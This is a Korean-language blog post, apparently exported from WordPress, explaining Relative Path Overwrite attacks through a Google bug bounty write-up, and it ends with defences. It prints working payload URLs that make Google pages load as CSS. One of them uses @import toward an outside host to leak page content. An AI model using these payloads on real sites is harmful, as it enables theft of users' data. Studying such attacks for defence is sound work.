\uc0c1\ud0dc \ucf54\ub4dc\ub97c \ud1b5\ud574 \ud30c\uc77c\uc758 \uc874\uc7ac \uc720\ubb34\ub97c \uc54c \uc218 \uc788\uc744 \ubfd0\uc774\ub2e4. \uc5ec\uae30\uc11c RPO\uc758 \uac1c\ub150\uc774 \uc2dc\uc791\ub41c\ub2e4.\ube0c\ub77c\uc6b0\uc800\uc640 \uc11c\ubc84\uac00 URL \uacbd\ub85c\ub97c \ud574\uc11d\ud558\ub294\ub370\uc5d0 \uc788\uc5b4 \ubc1c\uc0dd\ud558\ub294 \ucc28\uc774\ub97c \uc18d\uc774\ub294\uac83\uc774\ub2e4.\uc608\ub97c\ub4e4\uc5b4 dot (.), slash (\/), backslash (\\), question mark (?), semi-colon (;) \ud639\uc740 \uc774\uac83\ub4e4\uc774 URL \uc778\ucf54\ub529\ub418\uba74 URL\uc5d0\uc11c \ud2b9\uc218\ud55c \uc758\ubbf8\ub97c \uac16\ub294\ub2e4.\uc11c\ubc84\uc640 \ube0c\ub77c\uc6b0\uc800\ub294 \uc774\ub97c \uc11c\ub85c \ub2e4\ub974\uac8c \ud574\uc11d\ud560 \uc218 \uc788\ub2e4.\uc774 \ud574\uc11d\uc758 \ucc28\uc774\ub97c \uc545\uc6a9\ud558\ub294\uac83\uc774 RPO\uc758 \uac1c\ub150\uc774\ub2e4. Self-referencing <link href=”style.css” rel=”stylesheet” type=”text\/css” \/> \uc704\uc640 \uac19\uc740 \ucf54\ub4dc\uac00 \uc874\uc7ac\ud558\ub294 \/somepage.php \ud30c\uc77c\uc744 \ud638\ucd9c\ud55c\ub2e4\uace0 \uac00\uc815\ud574\ubcf4\uc790.link \ud0dc\uadf8\ub97c \ud1b5\ud574 \/style.css \ud30c\uc77c\uc774 \ud638\ucd9c\ub420\uac83\uc774\ub2e4.\uadf8\ub7ec\uba74 \uc774\ubc88\uc5d0\ub294 url rewrite\ub97c \uc545\uc6a9\ud574 \/somepage.php\/path\/ \ud30c\uc77c\uc744 \ud638\ucd9c\ud574\ubcf4\uc790.\uc2e4\uc81c\ub85c \uc11c\ubc84\uc5d0\uc11c \ud638\ucd9c\ub418\ub294 \ud30c\uc77c\uc740 \/somepage.php \uc774\uc9c0\ub9cc \ube0c\ub77c\uc6b0\uc800\ub294 \/somepage.php\/path\/ \ub97c \ub514\ub809\ud1a0\ub9ac\ub85c \uc778\uc2dd\ud558\uac8c \ub41c\ub2e4.\ub530\ub77c\uc11c link\ud0dc\uadf8\ub97c \ud1b5\ud574 \ud638\ucd9c\ub418\ub294 css\ud30c\uc77c\uc758 \uacbd\ub85c\ub294 \/somepage.php\/path\/style.css \uac00 \ub41c\ub2e4.\ubc18\uba74 \uc11c\ubc84\uc5d0\uc11c \uc751\ub2f5\ud558\ub294 \ud30c\uc77c\uc758 \ub0b4\uc6a9\uc740 \/somepage.php \uac00 \ub420 \uac83\uc774\ub2e4.\uc989 somepage.php\uc758 HTML\ucf54\ub4dc\ub97c CSS\ub85c import\ud558\uac8c \ub41c\ub2e4.CSS\ub294 \ubb38\ubc95\uc5d0 \ub9de\uc9c0 \uc54a\ub294 \ucf54\ub4dc\ub294 \ubb34\uc2dc\ud558\uace0 \ubb38\ubc95\uc5d0 \ub9de\ub294 \ucf54\ub4dc\uac00 \ub098\uc62c\ub54c\uae4c\uc9c0 \uacc4\uc18d \ub2e4\uc74c\uc904\ub85c \ub118\uc5b4\uac04\ub2e4\ub294 \ud2b9\uc131\uc744 \uc0dd\uac01\ud574\ubcf4\uba74 \uc758\ubbf8\uc2ec\uc7a5\ud558\uc9c0 \uc54a\uc740\uac00? \ud83d\ude42 \uc2e4\uc2b5 Google\uc5d0\uc11c RPO \uae30\ubc95\uc744 \ud1b5\ud574 Bug Bounty\ub97c \uc131\uacf5\ud55c \uc0ac\ub840\ub97c \ub530\ub77c\uac00\uba70 RPO\uc758 \uc2e4\uc81c \uc0ac\uc6a9\uc608\uc2dc\ub97c \ub2e4\ub8e8\uc5b4\ubcf4\uc790.\uba3c\uc800 \uc0c1\ub300 \uacbd\ub85c\ub85c css\ud30c\uc77c\uc744 \ubd88\ub7ec\uc624\ub294 \ubb38\uc11c\ub97c \ucc3e\ub294\ub2e4. http:\/\/www.google.com\/tools\/toolbar\/buttons\/apis\/howto_guide.html <html> <head> <title>Google Toolbar API – Guide to Making Custom Buttons<\/title> <link href=”..\/..\/styles.css” rel=”stylesheet” type=”text\/css” \/> [..] \ub2e4\uc74c\uc73c\ub85c \ud0c0\uac9f \uc11c\ubc84\uac00 \uacbd\ub85c\ub97c \uc5b4\ub5bb\uac8c \ud574\uc11d\ud558\ub294\uc9c0\ub97c \ubd84\uc11d\ud574\uc57c \ud55c\ub2e4.\ube0c\ub77c\uc6b0\uc800\uc5d0\uc11c \ub514\ub809\ud1a0\ub9ac\ub294 slash(\/) \ub85c \uad6c\ubd84\ub41c\ub2e4.\uadf8\ub7ec\ub098 \uc11c\ubc84\uc5d0\uc11c\ub294 \ub514\ub809\ud1a0\ub9ac\ub97c \uad6c\ubd84\ud558\ub294\ub370\uc5d0 slash(\/) \uc678\uc5d0\ub3c4 \ub2e4\ub978 \ubb38\uc790\uac00 \uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4.\uc608\ub97c\ub4e4\uc5b4 JSP\uc5d0\uc11c\ub294 semi-colon(;) \ub4a4\uc5d0 \uc624\ub294 \ubaa8\ub4e0 \ubb38\uc790\ub97c \ud30c\ub77c\ubbf8\ud130\ub85c \ucc98\ub9ac\ud55c\ub2e4.e.x) http:\/\/example.com\/path;\/notpath\ud558\uc9c0\ub9cc \ube0c\ub77c\uc6b0\uc800\ub294 \uc774\ub7f0 \ud328\ud134\uc744 \uc778\uc2dd\ud560 \uc218 \uc5c6\uae30\uc5d0 \uc608\uc2dc\uc5d0\uc11c path; \uc640 notpath\ub97c \uac01\uac01 \uacbd\ub85c\ub85c \ucc98\ub9ac\ud55c\ub2e4. \ube44\uc2b7\ud558\uac8c \uc6b0\ub9ac\uac00 \ucc3e\uc740 \uad6c\uae00 \ud234\ubc14 \uc11c\ube44\uc2a4\uc5d0\ub294 \uacbd\ub85c\ub97c \ud574\uc11d\ud558\ub294 \uc790\uccb4\uc801\uc778 \ubc29\ubc95\uc774 \uc874\uc7ac\ud588\ub2e4.\uc11c\ubc84 \uc55e\ub2e8\uc758 \ud504\ub85d\uc2dc\uc5d0\uc11c Request\uac00 \uc2e4\uc81c \uc11c\ubc84\uc5d0 \ub118\uc5b4\uac00\uae30 \uc804\uc5d0 \uacbd\ub85c\ub97c decode\ud574\uc8fc\ub294 \uc5ed\ud560\uc744 \ud558\ub294\uac83\uc73c\ub85c \ucd94\uce21\ub41c\ub2e4.\uc774 \ub355\ubd84\uc5d0 \uacbd\ub85c\uc5d0 %2f\ub97c \uc785\ub825\ud588\uc744\ub54c slash\ub85c \uce58\ud658\ub418\uc5b4 \ucc98\ub9ac\ub418\uc5c8\ub2e4.http:\/\/www.google.com\/tools\/toolbar\/buttons\/apis%2fhowto_guide.html \uc11c\ubc84\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons\/apis\/howto_guide.html\ube0c\ub77c\uc6b0\uc800\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons\/apis%2fhowto_guide.html\ud638\ucd9c\ub418\ub294 CSS \ud30c\uc77c : \/tools\/toolbar\/buttons\/..\/..\/style.css(Bold\uccb4\ub294 \uc2e4\uc81c \uacbd\ub85c\ub97c \uc758\ubbf8\ud55c\ub2e4) \uc774\uc81c \uacbd\ub85c\uac00 \/tools\/toolbar\/buttons\/apis\/ \ub300\uc2e0 \/tools\/toolbar\/buttons\/ \ub97c \uac00\ub9ac\ud0a4\uac8c \ub418\uc5c8\ub2e4.\ub354 \ub9ce\uc740\uac83\uc774 \uac00\ub2a5\ud558\uc9c0 \uc54a\uc744\uae4c?\ubb3c\ub860\uc774\ub2e4. \uc6b0\ub9ac\ub294 \ub514\ub809\ud1a0\ub9ac\ub97c \uc18d\uc77c \uc218 \uc788\ub2e4. http:\/\/www.google.com\/tools\/fake\/..%2ftoolbar\/buttons\/apis%2fhowto_guide.html \uc11c\ubc84\uce21 \uad00\uc810 : \/tools\/fake\/..\/toolbar\/buttons\/apis\/howto_guide.html\ube0c\ub77c\uc6b0\uc800\uce21 \uad00\uc810 : \/tools\/fake\/..%2ftoolbar\/buttons\/apis%2fhowto_guide.html\ud638\ucd9c\ub418\ub294 CSS \ud30c\uc77c : \/tools\/fake\/..%2ftoolbar\/buttons\/..\/..\/style.css(Bold\uccb4\ub294 \uc2e4\uc81c \uacbd\ub85c\ub97c \uc758\ubbf8\ud55c\ub2e4) \uc790, \uc774\uc81c \/tools\/fake\/styles.css \ub97c import \ud558\uac8c \ub418\uc5c8\ub2e4. \uc774\ub807\uac8c \ud574\uc11c \uc6b0\ub9ac\ub294 http:\/\/www.google.com\/ \uc5d0 \uc874\uc7ac\ud558\ub294 \ubaa8\ub4e0 style.css \ud30c\uc77c\uc744 \ud638\ucd9c\ud560 \uc218 \uc788\uac8c \ub418\uc5c8\ub2e4.\uadf8 \ud6c4 \ucd94\uac00\uc801\uc778 \ud0d0\uc0c9\uc744 \ud558\ub2e4\uac00http:\/\/www.google.com\/tools\/toolbar\/buttons\/gallery \ud398\uc774\uc9c0\uac00http:\/\/www.google.com\/gadgets\/directory?synd=toolbar&frontpage=1 \ub85c \ub9ac\ub2e4\uc774\ub809\ud2b8\ub418\ub294\uac83\uc744 \ubc1c\uacac\ud588\ub2e4.\ub9ac\ub2e4\uc774\ub809\ud2b8\uc5d0\ub294 \ucffc\ub9ac\uc2a4\ud2b8\ub9c1\uc774 \ud3ec\ud568\ub41c\ub2e4.\uc989http:\/\/www.google.com\/tools\/toolbar\/buttons\/gallery?foo=bar \uc5d0 \uc811\uc18d\ud558\uba74 http:\/\/www.google.com\/gadgets\/directory?synd=toolbar&frontpage=1&foo=bar \ub85c \ub9ac\ub2e4\uc774\ub809\ud2b8\ub41c\ub2e4. \ub610\ud55c \ub9ac\ub2e4\uc774\ub809\ud2b8\ub41c \/gadgets\/directory \ud398\uc774\uc9c0\ub294 q \ud30c\ub77c\ubbf8\ud130\ub85c \ubc1b\uc544\uc628 \uac12\uc744 response\uc5d0 \ud3ec\ud568\uc2dc\ud0a8\ub2e4. http:\/\/www.google.com\/gadgets\/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red} \ub9cc\uc57d \uc774 \ud398\uc774\uc9c0\ub97c CSS\ud30c\uc77c\ub85c \ud638\ucd9c\ud558\uba74 \uc704\uc758 html \ucf54\ub4dc\uac00 \ubaa8\ub450 \ubb34\uc2dc\ub418\ub2e4\uac00 83\ub77c\uc778\uc758 {}*{background:red} \ub97c \ub9cc\ub098 \uc2a4\ud0c0\uc77c\uc2dc\ud2b8\uac00 \uc2e4\ud589 \ub420 \uac83\uc774\ub2e4. \uc774\uc81c \ud37c\uc990\uc758 \ubaa8\ub4e0 \uc870\uac01\uc774 \ubaa8\uc600\ub2e4. \ucd5c\uc885 \ud398\uc774\ub85c\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.http:\/\/www.google.com\/tools\/toolbar\/buttons%2Fgallery%3Fq%3D%0a%7B%7D*%7Bbackground%3Ared%7D\/..%2F\/apis\/howto_guide.html \uc11c\ubc84\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons\/gallery?q=%0a{}*{background:red}\/..\/\/apis\/howto_guide.html\ube0c\ub77c\uc6b0\uc800\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D\/..%2f\/apis\/howto_guide.html\ud638\ucd9c\ub418\ub294 css \ud30c\uc77c : \/tools\/toolbar\/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D\/..%2f\/apis\/..\/..\/style.css\u21d3\/tools\/toolbar\/buttons\/gallery?q=%0a{}*{background:red}\/style.css\u21d3\/gadgets\/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}\/style.css Internet Explorer 8 \uc774\ud558\uc5d0\uc11c expression(alert(document.domain)) \uc640 \uac19\uc740 \ud398\uc774\ub85c\ub4dc\ub97c \ud1b5\ud574 CSS\uc5d0\uc11c JavaScript \ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\ub294\uac8c \uac00\ub2a5\ud558\ub2e4.\ud558\uc9c0\ub9cc Google Vulnerability Reward Program \uc5d0\uc11c\ub294 IE9\ubcf4\ub2e4 \ub0ae\uc740 \ubc84\uc804\uc758 \ube0c\ub77c\uc6b0\uc800\ub294 \ubc14\uc6b4\ud2f0 \ub300\uc0c1\uc5d0\uc11c \uc81c\uc678\ud55c\ub2e4\uace0 \uba85\uc2dc\ub418\uc5b4\uc788\ub2e4. In particular, we exclude Internet Explorer prior to version 9 \uc9c0\uae08 \uc6b0\ub9ac\ub294 \uc704\uc5d0\uc11c \ucc3e\uc740 \ucde8\uc57d\uc810\uc744 \ud1b5\ud574 https:\/\/www.google.com\/ \uc0c1\uc5d0 \uc874\uc7ac\ud558\ub294 \ubaa8\ub4e0 \ud398\uc774\uc9c0\ub97c CSS\ub85c \uac00\uc838\uc62c \uc218 \uc788\ub2e4. \uadf8\ub807\ub2e4\uba74 \uc774\uc81c \ubb34\uc5c7\uc744 \ud560 \uc218 \uc788\uc744\uae4c?\ub2e4\ub978 \ud398\uc774\uc9c0\uc5d0\uc11c\uc758 \ubbfc\uac10 \uc815\ubcf4 \uc720\ucd9c\uc744 \uc2dc\ub3c4\ud574 \ubcfc \uc218 \uc788\ub2e4.\ubbfc\uac10 \uc815\ubcf4 \uc720\ucd9c\uc744 \uc704\ud574\uc11c\ub294 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \ubbfc\uac10 \uc815\ubcf4\ubcf4\ub2e4 \uc55e\uc5d0 \uc788\uc5b4\uc57c\ud558\uba70 %0a, %0c, %0d\ub4f1 \uc904\ubc14\uafc8 \ubb38\uc790\ub97c \ud5c8\uc6a9\ud574\uc57c\ud55c\ub2e4.\uad6c\uae00 \uac80\uc0c9 \ud398\uc774\uc9c0\uac00 \uc774\ub7f0 \uc870\uac74\uc744 \ub9cc\uc871\ud588\ub2e4.http:\/\/www.google.com\/search?nord=1&q={}%0a@import”\/\/innerht.ml? @import”\/\/innerht.ml? \ub97c \ud1b5\ud574 \uc30d\ub530\uc74c\ud45c\uac00 \ub05d\ub0a0\ub54c\uae4c\uc9c0\uc758(\ub4dc\ub798\uadf8 \ub41c \ubb38\uc790\uc5f4) \ubb38\uc11c\uc758 \ub0b4\uc6a9\uc744 \uacf5\uaca9\uc790\uac00 \uac00\ub85c\ucc4c \uc218 \uc788\ub2e4. \ucd5c\uc885 \ud398\uc774\ub85c\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4. http:\/\/www.google.com\/tools\/toolbar\/buttons%2Fgallery%3Fq%3D%0a%7B%7D%40import%27%2Fsearch%3Fnord%3D1%26q%3D%7B%7D%250a%40import%2527%2F%2Finnerht.ml%3F%22\/..%2F\/apis\/howto_guide.html \uc608\uc2dc \ub2e4\uc74c\uc740 \uacbd\ub85c \ud574\uc11d \uacfc\uc815\uc744 \ud63c\ub3d9\uc2dc\ud0a4\ub294 \uba87\uac00\uc9c0 \uc608\uc2dc\uc774\ub2e4. \/page.asp\/page.asp\/PAYLOAD\/\/\/page.asp\/PAYLOAD\/style.css Path Parameter(Simple) \/page.php\/param1\/param2\/page.php\/PAYLOADparam1\/PAYLOADparam2\/\/\/page.php\/PAYLOADparam1\/PAYLOADparam2\/style.cssPath Parameter(PHP or ASP) \/page.jsp;param1;param2\/page.jsp;PAYLOADparam1;PAYLOADparam2\/\/\/page.jsp;PAYLOADparam1;PAYLOADparam2\/style.cssPath Parameter(JSP) \/dir\/page.aspx\/PAYLOAD\/..%2Fdir\/PAYLOAD\/..%2Fpage.aspx\/\/\/PAYLOAD\/..%2Fdir\/PAYLOAD\/..%2Fpage.aspx\/style.cssEncoded Path \/page.html?k1=v1&k2=v2\/page.html%3Fk1=PAYLOADv1&k2=PAYLOADv2\/\/\/page.html%3Fk1=PAYLOADv1&k2=PAYLOADv2\/style.cssEncoded Query \ubc29\uc5b4\ubc29\ubc95 \ubaa8\ub4e0 \ub9ac\uc18c\uc2a4\ub97c \uc808\ub300\uacbd\ub85c\ub85c\ub9cc \ud638\ucd9c\ud558\uac70\ub098, \uc0c1\ub300\uacbd\ub85c\uc758 \uae30\uc900\uc774 \ub418\ub294 \uc808\ub300\uacbd\ub85c\ub97c \uc9c0\uc815\ud558\ub294 \uc5ed\ud560\uc744 \ud558\ub294 Base\ud0dc\uadf8\ub97c \uc0ac\uc6a9\ud574 \uacbd\ub85c \ud574\uc11d\uc758 \ubaa8\ud638\uc131\uc744 \uc5c6\uc568 \uc218 \uc788\ub2e4.\ub610\ud55c \uc0ac\uc6a9\uc790\uac00 \uc785\ub825\ud55c \ubaa8\ub4e0 \ud2b9\uc218\ubb38\uc790\ub294 HTML Entity\ub85c \uce58\ud658\ud55c\ub2e4.\uadf8\ub9ac\uace0 X-Content-Type-Options HTTP \ud5e4\ub354\ub97c \uc120\uc5b8\ud574 \uc11c\ubc84\uac00 \uc804\uc1a1\ud55c MIME \ud0c0\uc785\ub9cc \uc0ac\uc6a9\ud558\uac8c \ud558\uac70\ub098,X-Frame-Options \ud5e4\ub354\ub97c \uc120\uc5b8\ud574 \ud504\ub808\uc784 \ub0b4\uc5d0\uc11c \ud398\uc774\uc9c0\ub97c \ub2e4\uc2dc \ub85c\ub4dc\ud560 \uc218 \uc5c6\uac8c \ud558\ub294\ub4f1\uc758 \ubc29\ubc95\uc774 \uc788\ub2e4. Reference https:\/\/seclab.ccs.neu.edu\/static\/publications\/www2018rpo.pdfhttps:\/\/www.mbsd.jp\/Whitepaper\/rpo.pdfhttps:\/\/blog.innerht.ml\/rpo-gadgets\/<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/332"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=332"}],"version-history":[{"count":36,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/332\/revisions"}],"predecessor-version":[{"id":370,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/332\/revisions\/370"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=332"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=332"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=332"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}